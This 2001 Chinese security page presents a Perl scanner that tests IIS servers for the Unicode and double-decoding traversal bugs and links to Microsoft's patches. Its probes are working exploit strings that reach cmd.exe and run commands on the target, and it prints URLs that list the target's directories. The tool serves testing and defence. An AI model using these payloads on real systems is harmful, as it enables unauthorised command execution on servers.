一份检查你的IIS是否存在那两个重大漏洞的代码
/ns/wz/sys/data/20010527070114.htm
Details
下列程序用于检验你的服务器是否存在 Escaped Characters Decoding Bug 和 Unicode Directory Traversal Bug（脚本中写作 Transversal）。如果服务器存在漏洞，它会给出一个能解决问题的补丁 URL。
Tool:
#!/usr/bin/perl
#
# iis_promisc v2.0
#
# This is a perl script to test the infamous
# Microsoft IIS holes:
#
# -*- Escaped Characters Decoding Bug
# -*- Unicode Directory Transversal Bug
#
# * Support Proxy Server
# * Over 20 tests will be made ( if found display the patch URL too :)
#
# Added to v2:
#
# -*- Executable File Parsing Bug check
# -*- Over 40 bugs tested!
#
# * REQUIRE LWP(Lib WWW for Perl) http://www.linpro.no/lwp/
# The package libwww is found in many linux distributions
#
# by inode@unsekure.com.br
# greetz to #unsekure @ irc.brasnet.org
# http://unsekure.com.br
#
# 05/2001
use LWP;

# Exactly one argument is expected: the host name of the web server to check.
# Without it the usage banner is printed and the script stops.
die "\n-*- iis_promisc -*-\nUse: $0 www.target.com\n\n" unless @ARGV;

# Shared HTTP client; conn() sends every probe through it.
$ua = LWP::UserAgent->new;
## Uncomment the line below to use a proxy server
#$ua->proxy(['http'], 'http://proxy.server.com:PORT/');
$ua->timeout(60);
# Every probe carries this fixed User-Agent string.
$ua->agent("Mozilla/5.0 (Win95)");

$target    = $ARGV[0];
$vuln_flag = 0;          # number of probes whose response contained the marker
# NOTE(review): $port is assigned but never read in the visible script;
# the request URL is built from $target alone.
$port = 80;

# Query suffix appended to every probe path. The echoed word is the marker the
# scan loop looks for in the response body. Because it is a fixed literal, it
# is also a convenient string to search for in web server logs when checking
# whether this tool has been run against a host.
$test_command = "winnt/system32/cmd.exe?/c+echo+MinhaNossaSenhoraDoPerpetuoSocorro";
# Suffix used only when printing the URL of a finding.
$dir_command = "winnt/system32/cmd.exe?/c+dir";
# Set by conn() after each request: true while the Server header mentions IIS.
$iis = "1";
# Virtual directories used as the starting point of each probe; "/" is the
# wwwroot. Further directories can be appended to the list (for example
# /somedir/). Every entry is combined with every encoding in @string.
my @dir = qw(
    /
    /scripts/
    /msadc/
    /cgi-bin/
    /bin/
    /samples/
    /_vti_cnf/
    /_vti_bin/
    /adsamples/
    /iisadmpwd/
    /Rpc/
    /PBServer/
);
# Encoded "parent directory" sequences placed between a directory from @dir
# and $test_command. Each one hides a path separator behind an encoding that a
# correct server must not turn back into '/' or '\' after its path checks.
# The same sequences are what to look for in request logs and IDS rules.
my @string = (
    # "%25" is an encoded '%': one decoding pass leaves "%5c", a second pass
    # yields '\'. This is the double-decoding case.
    '..%255c..%255c..%255c..%255c..%255c..%255c',

    # C0 AF is an overlong (non-shortest) two-byte UTF-8 form of '/'.
    '..%c0%af../..%c0%af../..%c0%af../',

    # E0 80 AF is an overlong three-byte UTF-8 form of '/'.
    '..%e0%80%af../..%e0%80%af../..%e0%80%af../',

    # C1 9C is an overlong two-byte UTF-8 form of '\', here behind a .bat
    # file name. NOTE(review): presumably the v2 "Executable File Parsing
    # Bug" check named in the header; confirm against the advisory.
    'boo.bat/..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C..%C1%9C',
);
# Prefix printed in front of each finding. When OSTYPE (or, if that is unset
# or false, TERM) contains "linux" the line starts with "lynx -dump";
# everywhere else it starts with the VULN banner.
# NOTE(review): the report format therefore depends on the operator's
# environment, which matters to anything that parses this output.
my $env_hint = $ENV{'OSTYPE'} || $ENV{'TERM'};
$found = ($env_hint =~ /linux/) ? "lynx -dump" : "-*- VULN -*-";
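# Probe loop: request every directory/encoding combination through conn() and
# count the responses whose body contains the echo marker.
#
# Fix over the original: the "is this still IIS?" check now runs right after
# each request. The original tested $iis at the top of the *next* pass and
# printed $output_line there, which is never set at that point. A failure on
# the very last probe therefore fell through to the final report and produced
# a "Not vulnerable" verdict straight after the error message.
#
# NOTE(review): the marker is part of the requested URL, so a server whose
# error page echoes the request URL back would also match; treat a hit as
# something to confirm, not as proof.
foreach $vul_dir (@dir) {
    foreach $vul_string (@string) {
        @output = conn($vul_dir.$vul_string);

        unless ($iis) {
            # conn() has already printed the reason (not IIS / HTTP error).
            # The result is inconclusive, so stop without giving a verdict.
            print "\n";
            exit;
        }

        foreach $output_line (@output) {
            if ($output_line =~ /MinhaNossaSenhoraDoPerpetuoSocorro/) {
                $vuln_flag = $vuln_flag + 1;
                # The reported URL uses $dir_command, not the echo probe.
                print "\n$found http://".$target.$vul_dir.$vul_string.$dir_command."\n";
            }
        }
    }
}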
# Final verdict.
#
# A clean run only means that none of the directory/encoding combinations
# listed above returned the marker through winnt/system32/cmd.exe. It is not
# proof that the patches are installed.
if ($vuln_flag == 0) {
    print "\n-*- $target: Not vulnerable -*-\n\n";
    exit;
}

# At least one probe matched. The script only counts hits and does not record
# which encoding produced them, so all three patch sections are always printed
# together. The links are the ones published with the tool in 05/2001.
print qq~
-*--*--*--*--*--*--*--*--*--*--*--*--*-
-*- Escaped Characters Decoding Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/q293826/NT5/EN-US/Q293826_W2K_SP3_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://download.microsoft.com/download/winntsp/Patch/q293826/NT4/EN-US/Q295534i.exe
-*--*--*--*--*--*--*--*--*--*--*--*--*-*-
-*- Unicode Directory Transversal Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
-*--*--*--*--*--*--*--*--*--*--*-*-
-*- Executable File Parsing Bug -*-
-*- Microsoft IIS 5.0 PATCH:
-*- http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE
-*- Microsoft IIS 4.0 PATCH:
-*- http://www.microsoft.com/ntserver/nts/downloads/critical/q277873
-*- $vuln_flag hole(s) found at $target! -*-
~;
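# conn($path_prefix)
#
# Sends one GET request for http://$target . $path_prefix . $test_command
# through the shared $ua and classifies the reply by its Server header.
#
#   Server header contains "IIS": sets $iis = 1 and returns the response body.
#   Anything else: sets $iis = 0, stores the status code in $err, prints a
#   one-line reason and returns nothing.
#
# Fixes over the original: the failure path used "return print ...", which
# handed print's status (1) back to the caller as if it were response content.
# It now returns an empty list. A reply without a Server header is treated as
# an empty string rather than matched as undef.
#
# NOTE(review): classification relies on the Server header alone. A host that
# hides or rewrites that header (or sits behind a proxy that does) is reported
# as not IIS, and the caller stops the run without testing anything.
sub conn {
    my ($GET_STR) = @_;

    my $req = HTTP::Request->new('GET', 'http://'.$target.$GET_STR.$test_command);
    my $res = $ua->request($req);

    my $server = $res->server;
    $server = '' unless defined $server;

    if ($server =~ /IIS/) {
        $iis = 1;
        return $res->content;
    }

    $iis = 0;
    $err = $res->code;
    if ($err == 404) {
        print "\n-*- Not running MS-IIS -*-\n";
    }
    else {
        print "\n-*- HTTP error code $err Connection problems -*-\n";
    }
    return;
}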
Links
The information has been provided by Leonardo Eloy and Alexandre de Abreu.